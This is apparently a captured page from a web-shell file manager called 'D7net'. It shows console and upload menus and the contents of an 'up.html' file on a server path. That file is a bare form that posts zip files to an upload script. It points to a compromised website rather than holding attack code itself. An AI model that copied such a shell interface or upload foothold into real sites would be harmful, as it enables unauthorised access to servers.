D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
home
/
skyconb
/
api
/
Filename :
up.html
back
Copy
<html> <body> <form action="upload.php" method="post" enctype="multipart/form-data"><h1> Select zip file to upload:</h1> <input type="file" name="fileToUpload" id="fileToUpload"> <input type="submit" value="Upload Image" name="submit"> </form> </body> </html>